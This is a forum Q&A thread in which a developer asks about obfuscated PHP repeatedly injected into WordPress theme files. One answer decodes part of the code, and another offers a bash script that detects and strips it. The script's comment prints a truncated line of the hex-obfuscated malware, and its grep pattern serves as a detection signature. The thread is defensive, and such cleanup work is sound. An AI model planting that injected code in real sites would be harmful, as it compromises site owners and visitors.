Keep finding inject gibberish PHP in my Wordpress

2020-06-29 10:58发布

站内问答 / PHP
1881 2 4

I built a custom theme for a client's site and it keeps getting hacked, I guess. What I'm finding is a bunch of gibberish code at the top of each theme file and plugins as well. It's all super-compressed and not very easy to read, but it just looks like a bunch of numbers. It's not outputting anything on the site itself. The only reason I know it's happening is because the addition of the code to the plugins breaks the plugin and WP auto-disables it. This has happened about 5 or 6 times.

After the second time I realized that the default setup was not cutting it. So I installed WordFence and for a month it worked perfectly. WordFence started to paint a picture of just how many attacks are attempted against a site at any given moment. It's insane. I also changed all passwords (users, FTP, etc.), changed the table prefix, block wp-admin and used a different URL to access the dash, and followed pretty much every single item on the Hardening Wordpress article. Also took the advice of a few posts here.

All for nothing though it seems. After a solid month of success, the plugin and my measures stopped working. The useless strings started appearing at the top of theme files. But oddly enough, not plugin files. I cleared things out and tried the iThemes security suite instead of WordFence. NOPE! Woke up to find the site had been hacked again.

In addition to the above I've also narrowed down my plugins list to a select trusted few that have proven harmless on other sites: Formidable and Advanced Custom Fields. I'm worried I screwed up something in my theme somehow, but I've coded a dozen or so and never had this issue on any of those sites at all.

I'm at a loss for what to do. I feel like if I understood what the 'hack' did I'd be able to combat it better, but I'm at a loss. These things are very difficult to google. Any guidance would be appreciated.

Here is a link to the injected code

2条回答
放我归山
2楼-- · 2020-06-29 11:26

One way to narrow it down, would be to print_r(i believe its hex_values) From your pastebin:

$_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]

print_r(\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54);

output:

$_SERVER["HTTP_USER_AGENT"];

This small part of the code is documented in the official manual:

'HTTP_USER_AGENT' Contents of the User-Agent: header from the current request, if there is one. This is a string denoting the user agent being which is accessing the page. A typical example is: Mozilla/4.5 [en] (X11; U; Linux 2.2.9 i586). Among other things, you can use this value with get_browser() to tailor your page's output to the capabilities of the user agent.

To go through the entire code will take a while, because some of the "gibberish" is embedded in other functions.

A little warning, I am no security expert, nor php wizard, when testing any of the code try a sandbox online, like http://sandbox.onlinephpfunctions.com/

查看更多
0人赞 添加讨论(0) 举报
聊天终结者
3楼-- · 2020-06-29 11:44

I once found this issue in a server and I finally made a bash script that looks for this code removing only the top line from every infected PHP file. It resolved the issue.

I put here so you can use it to get rid of the malicious code, but remember to try to find how the server was hacked, so that you do not get hacked again.

It is quite simple to use in the bash shell:

Test if there are infected files

./remove_malware.sh /var/www/wp_path/

Clean the infected files

./remove_malware.sh /var/www/wp_path/ clean

The script (remove_malware.sh):

#!/bin/bash
#
# This script remove malware of PHP files.
#
# In this case it will remove some malicious code
# from all Wordpress PHP files that is at top of
#  every PHP file.
#
# The string at the top of every file is:
#
# <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x$
#
# This script tries to find the string inside $_SERVER
# of the above line at the top of the files to determine
# if the file is infected. If you run the script and
# nothing seems to be infected but you suspect and you 
# want to be sure, just open any PHP of Wordpress and 
# check if the malicious line code is present. If is 
# present but the script did not detect, it is because 
# the content inside $_SERVER may be diferent.
# In these cases, just replace in this script the string
# in the -e parameter of grep line with the content of 
# $_SERVER found in your PHP (remember to escape 
# the \ with \\\\) and run again this removal script.
#
#
# JavocSoft 2014
#

if [[ -z "$1" ]]; then
  echo "Directory where to find is required."
else
  grep -rnwl $1 --include \*.php -e "\\\\x48\\\\124\\\\x54\\\\120\\\\x5f\\\\125\\\\x53\\\\105\\\\x52\\\\137\\\\x41\\\\107\\\\x45\\\\116\\\\x54" | while read -r filename ; do

    if [[ ! -z "$2" ]]; then
       echo "Found file $filename. Cleaning..."
       awk 'BEGIN {matches=0} matches < 1 && /1/ { sub(/^.*<?php/,"<?php"); matches++ } { print $0 }' $filename > $filename.purged
       mv $filename $filename.bck
       mv $filename.purged $filename
    else
      echo "Found file $filename."
    fi

  done
  echo "Done."
fi
查看更多
0人赞 添加讨论(0) 举报
登录 后发表回答
相关问题
查看全部
相关文章
查看全部
收藏的人(4)